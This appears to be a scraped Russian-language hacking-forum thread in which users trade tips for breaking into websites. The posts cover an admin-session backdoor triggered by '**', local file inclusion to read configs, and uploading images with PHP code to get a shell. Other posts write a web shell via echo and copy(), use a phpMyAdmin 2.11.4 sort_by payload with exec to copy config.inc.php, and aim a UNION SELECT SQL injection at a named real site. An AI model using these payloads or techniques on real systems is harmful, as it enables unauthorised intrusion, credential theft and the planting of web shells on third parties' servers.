Такой вопрос... Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша К примеру Грузим файл под названием: file.php\jpg А PHP берет и загружает под именем: jpg
Народ,разъясните такую фишку: PHP: if(strstr($username, '**')) { $admin = 1; $username = str_replace('**', '', $username); $_SESSION['admin'] = 1; } else { $admin = 0; } Я так понял,если в поле username(входа в админку,например) содержится **,то я получаю админскую сессию,становясь,таким образом,админом?))И стать им может любой,кто введёт эти две звёздочки в любом месте поля username... Только я не понял смысла это выкладывать - ведь не узнаешь,пока исходник скрипта не прочитаешь(а я так понял,это самоделка какая-то,а не кусок кода популярного двига). Взял с _http://oxod.ru/2009/11/23/лучшие-из-лучших/#more-380
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге). Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
С такими способами один шанс на несколько тысяч миллиардов. для удаленного коннекта должен быть разрешен коннект именно для твоего айпи. ищи phpMyAdmin. Бруть диры. Могу посоветовать сканер http://security-digger.org/
Естественно , там localhost, то есть тока фактически с этого компа (серва) ты можеш приконнектиться к БД, а удаленно ни как попробуй найти форум/аплоад картинок/etc/ что ба залить фотку с пхп кодом, и инклудь ее уж тогда, что бы потом получить шелл,а вот с шелла и заходи в БД , если будет такая необходимость
Почему не работает команда lynx ? Вроде делаю всё прально: lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён.Touch работает.Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Посмотри есть ли сама качалка потом уже качай UPDATE: не проверил, но мне кажется синтаксис мягко говоря не верный. "www.obsd.si/faq/pf/index.html" ... (Чисто субъективное мнение, ни тебе протокола, ни здавствуйте, ни досвиданья! =))
Ага, типа в место phpinfo, думаю стоит указать что-то типа: и через этот скрипт средствами php уже грузить любые файлы.
А which тебе что покажет, если его нет? т.е. результат which which и which curl будет разный, если самого which нету? =\ З.Ы. Модеры, сорри
Хм..попробовал: echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php Чет не канает... Кстати,sudo команда доступна...Забыл добавить,что админка - Code: Siteman2 Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.
А <? ... ?> кто напишет? И что именно не канает? это расплывчатое понятие. 1) не загружается файл (естественно, в файле не скрипт а белиберда) 2) не пишется в сам файл 3) не могу форму сделать для загрузки файла 4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php
PhpmyAdmin 2.11.4 Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4). Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже. Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать. P.S. я про server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ. порты проскань,можешь найдешь что нить
_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
